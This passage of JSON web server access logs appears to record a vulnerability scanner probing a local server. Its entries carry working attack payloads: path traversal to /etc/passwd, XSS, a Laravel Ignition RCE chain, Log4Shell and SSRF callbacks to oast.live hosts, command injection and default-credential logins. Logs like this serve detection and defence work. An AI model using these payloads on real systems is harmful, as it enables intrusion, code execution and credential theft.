"http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:30 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.341","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:30 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /admin/error.log HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.347","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:30 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php/community/?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.423","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:30 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.htpasswd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.428","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:30 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/88 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.302","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:30 +0000","request_body":"{\x22solution\x22: \x22Facade\x5C\x5CIgnition\x5C\x5CSolutions\x5C\x5CMakeViewVariableOptionalSolution\x22, \x22parameters\x22: {\x22variableName\x22: \x22cve20213129\x22, \x22viewFile\x22: \x22=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=6F=00=4C=00=41=00=51=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=41=00=41=00=41=00=41=00=54=00=7A=00=6F=00=30=00=4D=00=44=00=6F=00=69=00=53=00=57=00=78=00=73=00=64=00=57=00=31=00=70=00=62=00=6D=00=46=00=30=00=5A=00=56=00=78=00=43=00=63=00=6D=00=39=00=68=00=5A=00=47=00=4E=00=68=00=63=00=33=00=52=00=70=00=62=00=6D=00=64=00=63=00=55=00=47=00=56=00=75=00=5A=00=47=00=6C=00=75=00=5A=00=30=00=4A=00=79=00=62=00=32=00=46=00=6B=00=59=00=32=00=46=00=7A=00=64=00=43=00=49=00=36=00=4D=00=6A=00=70=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=6C=00=64=00=6D=00=56=00=75=00=64=00=48=00=4D=00=69=00=4F=00=30=00=38=00=36=00=4D=00=7A=00=45=00=36=00=49=00=6B=00=6C=00=73=00=62=00=48=00=56=00=74=00=61=00=57=00=35=00=68=00=64=00=47=00=56=00=63=00=56=00=6D=00=46=00=73=00=61=00=57=00=52=00=68=00=64=00=47=00=6C=00=76=00=62=00=6C=00=78=00=57=00=59=00=57=00=78=00=70=00=5A=00=47=00=46=00=30=00=62=00=33=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=6D=00=56=00=34=00=64=00=47=00=56=00=75=00=63=00=32=00=6C=00=76=00=62=00=6E=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=77=00=4F=00=69=00=49=00=69=00=4F=00=33=00=4D=00=36=00=4E=00=6A=00=6F=00=69=00=63=00=33=00=6C=00=7A=00=64=00=47=00=56=00=74=00=49=00=6A=00=74=00=39=00=66=00=58=00=4D=00=36=00=4F=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=5A=00=58=00=5A=00=6C=00=62=00=6E=00=51=00=69=00=4F=00=33=00=4D=00=36=00=4D=00=6A=00=6F=00=69=00=61=00=57=00=51=00=69=00=4F=00=33=00=30=00=46=00=41=00=41=00=41=00=41=00=5A=00=48=00=56=00=74=00=62=00=58=00=6B=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=64=00=47=00=56=00=7A=00=64=00=48=00=52=00=6C=00=63=00=33=00=51=00=63=00=4A=00=39=00=59=00=36=00=5A=00=6B=00=50=00=61=00=39=00=61=00=45=00=49=00=51=00=49=00=45=00=47=00=30=00=6B=00=4A=00=2B=00=39=00=4A=00=50=00=6B=00=4C=00=67=00=49=00=41=00=41=00=41=00=42=00=48=00=51=00=6B=00=31=00=43=00a\x22}}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /_ignition/execute-solution HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.386","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:30 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.251","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:30 +0000","request_body":"{\x22type\x22:\x22index\x22,\x22spec\x22:{\x22type\x22:\x22index\x22,\x22ioConfig\x22:{\x22type\x22:\x22index\x22,\x22firehose\x22:{\x22type\x22:\x22http\x22,\x22uris\x22:[\x22 file:///etc/passwd \x22]}},\x22dataSchema\x22:{\x22dataSource\x22:\x22sample\x22,\x22parser\x22:{\x22type\x22:\x22string\x22, \x22parseSpec\x22:{\x22format\x22:\x22regex\x22,\x22pattern\x22:\x22(.*)\x22,\x22columns\x22:[\x22a\x22],\x22dimensionsSpec\x22:{},\x22timestampSpec\x22:{\x22column\x22:\x22no_ such_ column\x22,\x22missingValue\x22:\x222010-01-01T00:00:00Z\x22}}}}},\x22samplerConfig\x22:{\x22numRows\x22:500,\x22timeoutMs\x22:15000}}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /druid/indexer/v1/sampler?for=connect HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.393","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:30 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.284","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:30 +0000","request_body":"j_username=admin&j_password=12345678&j_character_encoding=UTF-8","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.292","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:30 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /%EF%BD%B0example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.272","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:30 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /examples/servlets/index.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.297","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:30 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /config/authentication_page.htm HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.328","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:30 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVendor HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.074","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:30 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /accounts/login/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.360","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:30 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /uir//etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.332","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:30 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.284","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:30 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.travis.sh HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.056","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:30 +0000","request_body":"{\x22solution\x22: \x22Facade\x5C\x5CIgnition\x5C\x5CSolutions\x5C\x5CMakeViewVariableOptionalSolution\x22, \x22parameters\x22: {\x22variableName\x22: \x22cve20213129\x22, \x22viewFile\x22: \x22php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\x22}}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /_ignition/execute-solution HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.291","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:30 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /menu/neo HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.317","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:30 +0000","request_body":"type='|cat /etc/passwd||'","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.377","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:30 +0000","request_body":"j_username=admin&j_password=security&j_character_encoding=UTF-8","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.287","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:30 +0000","request_body":"{\x0D\x0A \x22type\x22:\x22bulk\x22,\x0D\x0A \x22args\x22:[\x0D\x0A {\x0D\x0A \x22type\x22:\x22add_remote_schema\x22,\x0D\x0A \x22args\x22:{\x0D\x0A \x22name\x22:\x22test\x22,\x0D\x0A \x22definition\x22:{\x0D\x0A \x22url\x22:\x22https://c9oms3gsmpve1ijt0mc069rfesob31wf4.oast.live\x22,\x0D\x0A \x22headers\x22:[\x0D\x0A ],\x0D\x0A \x22timeout_seconds\x22:60,\x0D\x0A \x22forward_client_headers\x22:true\x0D\x0A }\x0D\x0A }\x0D\x0A }\x0D\x0A ]\x0D\x0A}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v1/query HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.287","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:30 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /examples/jsp/index.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.268","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:30 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /?page=example.com&_url=example.com&callback=example.com&checkout_url=example.com&content=example.com&continue=example.com&continueTo=example.com&counturl=example.com&data=example.com&dest=example.com&dest_url=example.com&dir=example.com&document=example.com&domain=example.com&done=example.com&download=example.com&feed=example.com&file=example.com&host=example.com&html=example.com&http=example.com&https=example.com&image=example.com&image_src=example.com&image_url=example.com&imageurl=example.com&include=example.com&langTo=example.com&media=example.com&navigation=example.com&next=example.com&open=example.com&out=example.com&page=example.com&page_url=example.com&pageurl=example.com&path=example.com&picture=example.com&port=example.com&proxy=example.com&redir=example.com&redirect=example.com&redirectUri=example.com&redirectUrl=example.com&reference=example.com&referrer=example.com&req=example.com&request=example.com&retUrl=example.com&return=example.com&returnTo=example.com&return_path=example.com&return_to=example.com&rurl=example.com&show=example.com&site=example.com&source=example.com&src=example.com&target=example.com&to=example.com&uri=example.com&url=example.com&val=example.com&validate=example.com&view=example.com&window=example.com&redirect_to=example.com&ret=example.com&r2=example.com&img=example.com&u=example.com&r=example.com&URL=example.com&AuthState=example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.324","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:30 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/dump.sql HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.921","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:30 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /nuxeo/login.jsp/pwn$%7B31333333330+7%7D.xhtml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.317","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:30 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /host-manager/html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.288","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:30 +0000","request_body":"{\x22solution\x22: \x22Facade\x5C\x5CIgnition\x5C\x5CSolutions\x5C\x5CMakeViewVariableOptionalSolution\x22, \x22parameters\x22: {\x22variableName\x22: \x22cve20213129\x22, \x22viewFile\x22: \x22phar://../storage/logs/laravel.log/test.txt\x22}}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /_ignition/execute-solution HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.289","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:30 +0000","request_body":"{\x22id\x22:1,\x22jsonrpc\x22:\x222.0\x22,\x22params\x22:{\x22username\x22:\x22minioadmin\x22,\x22password\x22:\x22minioadmin\x22},\x22method\x22:\x22Web.Login\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /minio/webrpc HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.468","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:30 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /admin/tools/a--%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.339","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:30 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /menu/stc HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.293","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:30 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVersion HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.367","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:30 +0000","request_body":"dir=%2Fetc%2F&onlyFiles=true","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.752","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:30 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v1/cluster/summary HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.369","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:30 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /install.sh HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.357","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:30 +0000","request_body":"j_username=system&j_password=password&j_character_encoding=UTF-8","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.238","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:30 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Fexample.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.282","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:30 +0000","request_body":"{\x22username\x22:\x22${jndi:ldap://${hostName}.c9oms3gsmpve1ijt0mc0miwhrnx3wj4bt.oast.live}\x22,\x22password\x22:\x22admin\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /suite-api/api/auth/token/acquire HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.317","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1/ui/", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:31 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.tar.gz HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:31 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/adminer/adminer.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:31 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/89 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.758","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:31 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /examples/websocket/index.xhtml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.359","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:31 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /telescope/requests HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.369","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:31 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /?location=search HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.320","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:31 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v4/graphiql HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.115","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:31 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /asynchPeople/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.577","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:31 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET 